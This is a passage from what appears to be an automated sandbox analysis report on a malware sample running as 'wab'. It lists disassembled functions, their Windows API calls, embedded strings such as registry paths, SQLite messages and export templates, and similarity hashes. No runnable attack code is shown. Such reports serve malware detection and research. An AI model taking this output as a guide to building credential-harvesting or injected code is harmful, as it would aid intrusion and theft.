                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageRectSend$Client
                                          • String ID:
                                          • API String ID: 2047574939-0
                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                          • String ID:
                                          • API String ID: 4218492932-0
                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                          • memcpy.MSVCRT ref: 0044A8BF
                                          • memcpy.MSVCRT ref: 0044A90C
                                          • memcpy.MSVCRT ref: 0044A988
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                          • memcpy.MSVCRT ref: 0044A9D8
                                          • memcpy.MSVCRT ref: 0044AA19
                                          • memcpy.MSVCRT ref: 0044AA4A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: gj
                                          • API String ID: 438689982-4203073231
                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                          • API String ID: 3510742995-2446657581
                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                          • memset.MSVCRT ref: 00405ABB
                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                          • SetFocus.USER32(?), ref: 00405B76
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscat
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 384018552-4153097237
                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                          • String ID: 0$6
                                          • API String ID: 2029023288-3849865405
                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                          • memset.MSVCRT ref: 00405455
                                          • memset.MSVCRT ref: 0040546C
                                          • memset.MSVCRT ref: 00405483
                                          • memcpy.MSVCRT ref: 00405498
                                          • memcpy.MSVCRT ref: 004054AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy$ErrorLast
                                          • String ID: 6$\
                                          • API String ID: 404372293-1284684873
                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                          • wcscpy.MSVCRT ref: 0040A0D9
                                          • wcscat.MSVCRT ref: 0040A0E6
                                          • wcscat.MSVCRT ref: 0040A0F5
                                          • wcscpy.MSVCRT ref: 0040A107
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                          • String ID:
                                          • API String ID: 1331804452-0
                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                          • String ID: advapi32.dll
                                          • API String ID: 2012295524-4050573280
                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                          • <%s>, xrefs: 004100A6
                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3473751417-2880344631
                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscat$_snwprintfmemset
                                          • String ID: %2.2X
                                          • API String ID: 2521778956-791839006
                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfwcscpy
                                          • String ID: dialog_%d$general$menu_%d$strings
                                          • API String ID: 999028693-502967061
                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                          Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memsetstrlen
                                          • String ID:
                                          • API String ID: 2350177629-0
                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                          Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                          • API String ID: 2221118986-1606337402
                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                          Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 265355444-0
                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                          • memset.MSVCRT ref: 0040C439
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                          • _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                          • memset.MSVCRT ref: 0040C4D0
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                          • String ID:
                                          • API String ID: 1973883786-0
                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004116FF
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2618321458-3614832568
                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004185FC
                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@AttributesFilememset
                                          • String ID:
                                          • API String ID: 776155459-0
                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                          • malloc.MSVCRT ref: 00417524
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                          • String ID:
                                          • API String ID: 2308052813-0
                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PathTemp$??3@
                                          • String ID: %s\etilqs_$etilqs_
                                          • API String ID: 1589464350-1420421710
                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                          Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040FDD5
                                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                          • String ID: <%s>%s</%s>$</item>$<item>
                                          • API String ID: 1775345501-2769808009
                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                          Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wcscpy.MSVCRT ref: 0041477F
                                          • wcscpy.MSVCRT ref: 0041479A
                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                          Strings
                                          Memory Dump Source
